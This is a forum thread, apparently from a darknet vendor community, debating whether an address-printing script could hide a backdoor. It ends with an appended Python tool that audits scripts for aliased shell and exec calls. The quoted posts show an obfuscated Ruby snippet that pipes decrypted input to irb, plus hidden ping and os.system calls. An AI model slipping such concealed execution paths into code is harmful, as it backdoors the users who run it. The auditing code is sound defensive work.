Quote from: kmfkewm on September 09, 2012, 06:04 am
Quote
inserting a function that checks decrypted addresses for such code to run AND is used in conjunction with an order containing that code AND is being run on a system with network access.
It doesn't need to check for code, it can check for anything. It can run messages that are 101 bytes as ruby code and puts all the others. And actually it doesn't even need that because you can directly issue commands to the terminal with Ruby at least and I would highly bet that you can with python.

Yep, I've demonstrated this a couple of times already. It's a function, though, Python doesn't have anything like Ruby's put command (no, I haven't learned the language, I just looked at the Wikipedia page on it).

Quote from: kmfkewm on September 09, 2012, 06:04 am
having `ping t.cc` in a script will ping t.cc, just need to encode it in some funky way to try to hide that it is happening. Now there is no need to load networking modules at all or to run any decrypted messages as code.

Okay, but calling the function necessary to invoke it is rather obvious. Locating that is just a matter of grepping for os.system.

Now I could conceal that a little with something like:

    import os
    s = os.system

But then it would still be clear that s("ping supersecretlebase.example.com") is a system call.

Quote from: kmfkewm on September 09, 2012, 06:04 am
Quote
* No encrypted data is shipped with my code.
But it gets encrypted data input from random customers

Yeah, when I wrote that I didn't get what your code was actually doing.

Quote from: kmfkewm on September 09, 2012, 06:04 am
Quote
* There is a copy of my GPG key currently. I think I will remove it in light of this and just include the details for obtaining it (it's here, on the vendor pages and on the key servers).
There is no reason for there to be a copy of your GPG key, in the example I gave the exploit is encrypted to the vendors key and they load it into the program, they have no ability to tell encrypted ruby code apart from encrypted addresses because ciphertext looks random in either case.

I've removed the key from the current dev branch for two reasons: to remove the possibility of hiding something in there and in case a user runs everything from the extracted directory instead of copying the specified files to a temp directory.

Quote from: kmfkewm on September 09, 2012, 06:04 am
Quote
* There is no such exploit in my code.
Possibly not. Probably not even!

Well, Pine has finally returned to the thread and she doesn't share your confidence in the probabilities.

Quote from: kmfkewm on September 09, 2012, 06:04 am
But nobody really knows unless we can look at it. That is the entire point of this thread. We should not have a culture here where peoples claims are taken at face value, especially when vendors are at risk. The purpose of my posting code was simply to show that even a tiny bit of code can make the difference between a secure program and a backdoored one. Honestly I was surprised at how well the backdoor was hidden, certainly better than in my first attempt where I simply unpacked all the calls to arrays of numbers. I have never tried hiding backdoors in code before, and if I tried harder I could probably even make it more subtle than the last example I gave.

Well, you're one ahead of me. I don't have any experience planting backdoors in code.

Quote from: kmfkewm on September 09, 2012, 06:04 am
Quote
* Such an exploit would be able to be spotted.
Indeed by anyone who knows the language well enough to
A. Know what back ticks do
B. Know what pack and unpack do
C. Know what | does on a terminal
D. Know what irb is
E. Know the language, since they wouldn't just look at that part of the code but would need to audit the entire thing
Such an exploit would be possible to spot if the program went through auditing, someone who doesn't know ruby is not going to look at my code and realize what is going on, they are going to see it doesn't have networking code included with it, has no IP addresses or ports listed, has no encrypted data included and then assume that they are safe. It would be even less likely to be spotted if I encoded the | as well, or maybe even the entire shell command.

Given the nature of os.system and struct in Python, I'd be surprised if it could be concealed as well as it can in Ruby. I could be wrong there, but I don't think so.

Quote from: kmfkewm on September 09, 2012, 06:04 am
Quote
* My code does not require or use a network connection in any way (vendors can make their own decisions on whether or not to utilise an air gap).
Neither does the example code I showed, it gets the networking require from the decrypted ciphertext.

It still needs network access, though.

Quote from: kmfkewm on September 09, 2012, 06:04 am
Quote
* Vendors do not need to purchase this using their vendor account, they can create a buyer's account, use that to conceal who they are and that they're using my code (as is the case for the vendor who asked me to write it). This would pretty effectively stop an exploit checking address data from being used in a live system.
You would still have intelligence that someone who needs software to manage printing a lot of addresses for them is using a certain IP address.

Fair point.

Quote from: kmfkewm on September 09, 2012, 06:04 am
Quote
So, your assertion that "100% of people who buy the script from Louis" will be fucked/exploited is as vile and baseless an assertion as Pine's statement that I am working for law enforcement. It's one thing to say, "here's how an exploit" could work, but it is another thing entirely to say that because you can think of an exploit then that's what I must be doing and therefore I am whatever you say I am.
I am just saying that we have no fucking clue what you are doing and I demonstrated that not all backdoors are as obvious as one would assume, even in a language like Ruby, which is similar enough to Python that the example works for demonstration purposes.

Which brings us back to proving it, which we've been round and round on. Your comment there wasn't merely pointing out what might be, it became an accusation at that point.

Quote from: kmfkewm on September 09, 2012, 06:04 am
Quote
You, sir, are now engaging in the same type of vile and slanderous accusations as Pine. Your assertion here that my code must contain an exploit because you thought of a way it might be done is as baseless as saying that because paedophiles use anonymous networks then everyone using an anonymous network is a paedophile. It is a fallacious argument and I believe you know this, now you're just flinging mud in the hope that it sticks.
Stop reading into shit. I never said your code must contain an exploit. I countered your claim that your code MUST NOT contain an exploit because it has NO NETWORKING CODE by showing how a single array of three numbers and a call to pack (which has nothing to do with networking) is all it takes for it to have networking code remotely injected into it (with user interaction....but the user interaction that the entire system is designed to handle anyway) via a ciphertext created from a specially crafted plaintext.

Actually, what you said in response to Limetless' question asking about your code and for proof of my engaging in some kind of deception was this:

Quote from: kmfkewm on September 08, 2012, 01:27 pm
Quote from: Limetless on September 08, 2012, 01:23 pm
And how does this relate to the person being accused.....
it shows that it is fucking stupid to use a script from ANYONE here if it isn't publicly audited, especially if you don't know the language well enough to recognize | #{[105, 114, 98].pack("c*")} is all that it takes to fuck you, which will consist of 100% of people who buy the script from Louis.

That pretty clearly states that because you thought of a way to conceal an exploit in a different language that therefore my code will 100% guarantee that users of it will be compromised.

That is a fallacious argument, the only purpose of which being to use in an ad hominem attack.
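The post above says that finding a hidden system call in a Python script is "just a matter of grepping for os.system", then shows that `s = os.system` already defeats that grep. The following is an added example written for this page, not code from either poster or from the script under discussion: a small audit that parses a script with Python's `ast` module and follows `import`, `from ... import` and plain assignment aliases, so the aliased call is still reported along with `exec`/`eval` and the usual subprocess entry points. The sink list, the names `SinkAuditor` and `audit_source`, and the sample script `SAMPLE` are all constructed for this example.

```python
import ast

# Constructed list of (module, attribute) pairs an auditor would want to see
# every call to, because each hands a string to a shell or to the interpreter.
SINKS = {
    ("os", "system"), ("os", "popen"),
    ("subprocess", "call"), ("subprocess", "run"),
    ("subprocess", "Popen"), ("subprocess", "check_output"),
}
# Builtins that evaluate data as code.
BUILTIN_SINKS = {"eval", "exec"}


class SinkAuditor(ast.NodeVisitor):
    """Walk a parsed module and record every call that resolves to a sink,
    even when the sink was reached through an alias."""

    def __init__(self):
        self.module_aliases = {}  # local name -> module   (import os as o)
        self.func_aliases = {}    # local name -> (module, attr)  (s = os.system)
        self.findings = []        # (line number, "module.attr")

    def visit_Import(self, node):
        for alias in node.names:
            self.module_aliases[alias.asname or alias.name] = alias.name
        self.generic_visit(node)

    def visit_ImportFrom(self, node):
        for alias in node.names:
            self.func_aliases[alias.asname or alias.name] = (node.module, alias.name)
        self.generic_visit(node)

    def resolve(self, node):
        """Return (module, attr) when the expression names a known function,
        following module and function aliases; otherwise None."""
        if isinstance(node, ast.Attribute) and isinstance(node.value, ast.Name):
            module = self.module_aliases.get(node.value.id)
            if module:
                return (module, node.attr)
        if isinstance(node, ast.Name):
            if node.id in self.func_aliases:
                return self.func_aliases[node.id]
            if node.id in BUILTIN_SINKS:
                return ("builtins", node.id)
        return None

    def visit_Assign(self, node):
        # `s = os.system` style aliasing: remember that `s` now means os.system,
        # which is exactly what a plain grep for "os.system(" would miss.
        target = self.resolve(node.value)
        if target:
            for t in node.targets:
                if isinstance(t, ast.Name):
                    self.func_aliases[t.id] = target
        self.generic_visit(node)

    def visit_Call(self, node):
        target = self.resolve(node.func)
        if target and (target in SINKS or target[0] == "builtins"):
            self.findings.append((node.lineno, "%s.%s" % target))
        self.generic_visit(node)


def audit_source(source):
    """Parse `source` and return [(lineno, 'module.attr'), ...] for every
    call that reaches a sink, in source order."""
    auditor = SinkAuditor()
    auditor.visit(ast.parse(source))
    return auditor.findings


# Constructed sample script that hides the system call behind an alias, the
# way the post above describes, plus two other sinks for comparison.
SAMPLE = """\
import os
s = os.system
from subprocess import check_output as co
def handle(addr):
    s("echo " + addr)
    co(["ls"])
    exec(addr)
"""

if __name__ == "__main__":
    for lineno, sink in audit_source(SAMPLE):
        print("line %d: call to %s" % (lineno, sink))
```

Run against `SAMPLE` this reports the aliased `os.system` on line 5, the renamed `subprocess.check_output` on line 6 and `exec` on line 7. The limit of this kind of check is the one the thread is really about: it follows names the parser can see, not strings that are only assembled at run time (a function looked up through `getattr` with a name unpacked from a list of numbers, for instance), so a clean result narrows the manual audit rather than replacing it.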